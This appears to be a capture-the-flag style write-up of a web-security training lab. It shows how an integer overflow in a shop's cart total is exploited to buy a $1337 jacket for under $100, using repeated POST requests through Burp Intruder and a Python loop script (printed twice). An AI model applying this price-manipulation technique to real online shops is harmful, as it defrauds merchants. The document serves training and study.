Low-level logic flaw

This lab doesn't adequately validate user input. You can exploit a logic flaw in its purchasing workflow to buy items for an unintended price. To solve the lab, buy a "Lightweight l33t leather jacket".

You can log in to your own account using the following credentials: wiener:peter

After successfully logging in, I observed that the jacket is priced at $1337, exceeding my budget of $100. In order to acquire the jacket within my financial constraints, I set out to exploit a vulnerability within the web application. Initially, I attempted manipulation of the price parameter during the interception of requests. However, this approach proved ineffective.

Subsequently, I directed my focus towards the quantity parameter to discern how the backend of the web application would handle a substantial integer input and its impact on the total value. It became apparent that the system only accepted integers with a maximum of two digits, limiting the quantity to 99. In light of this restriction, I decided to experiment with sending numerous requests to reach a cumulative high number.

To execute this, I opted for the Burp Intruder tool from Burp Suite. While it may not be as swift as the Intruder in the professional release, it sufficiently met my requirements for this particular scenario. If a higher volume of requests were necessary, I could have employed the Turbo Intruder extension to expedite the process. Alternatively, a custom script, such as the one outlined below, could have been employed to achieve the desired outcome more efficiently.

Using Python

import requests

url = "https://0a50003304a18a7380fe17c000f100dc.web-security-academy.net:443/cart"
cookies = {"session": "dsBTLQAd1GDSJGZJxibkD7OD1oy3qZhM"}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://0a50003304a18a7380fe17c000f100dc.web-security-academy.net", "Referer": "https://0a50003304a18a7380fe17c000f100dc.web-security-academy.net/product?productId=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}

for i in range(500):
    data = {"productId": "1", "redir": "PRODUCT", "quantity": "99"}
    requests.post(url, headers=headers, cookies=cookies, data=data)

Using BurpIntruder

After configuring Burp Intruder to target the POST /cart endpoint and selecting null payloads in the payload section, I opted for an indefinite payload loop. By repeatedly refreshing the /cart page, I observed a noteworthy consequence—the total price eventually displayed as a large negative number.

This occurrence can be attributed to surpassing the maximum value permitted for an integer in the backend programming language. Once this value is exceeded, it wraps around to the smallest negative number and continues incrementing.

Recognizing this behavior, I devised a strategy to settle the total price between 0 and 100. Given the jacket's cost of $1337, achieving this mathematically proved impractical as it would surpass the $100 budget. Consequently, the solution involved reaching the closest number before zero, switching the product to a cheaper alternative, and persistently sending POST requests until the total price fell within the desired range.

To execute this plan, I cleared the cart and adjusted Burp Intruder's payload settings to generate 324 payloads, positioning the total at -$64060.96.

Subsequently, I utilized Burp Repeater to resend the request, adjusting the quantity to 47—an optimal value to approach zero without exceeding the budget. Recognizing that another request with a quantity of 99 would result in a total price of $115.04, surpassing the budget, I strategically identified the need for an additional 47 units.

To achieve this, I introduced a new product with a lower cost than the jacket, priced at $83.63. Calculating the quantity needed to balance the total at zero, I determined that adding 15 units of this product would suffice. With this approach, the total price settled between $0 and $100, enabling a successful order placement and the resolution of the lab challenge.

Now I just place the order and LAB SOLVED!

PreviousWeak isolation on dual-use endpoint NextInfinite money logic flaw

Last updated 1 year ago

import requests url = "https://0a50003304a18a7380fe17c000f100dc.web-security-academy.net:443/cart" cookies = {"session": "dsBTLQAd1GDSJGZJxibkD7OD1oy3qZhM"} headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://0a50003304a18a7380fe17c000f100dc.web-security-academy.net", "Referer": "https://0a50003304a18a7380fe17c000f100dc.web-security-academy.net/product?productId=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"} for i in range(500): data = {"productId": "1", "redir": "PRODUCT", "quantity": "99"} requests.post(url, headers=headers, cookies=cookies, data=data)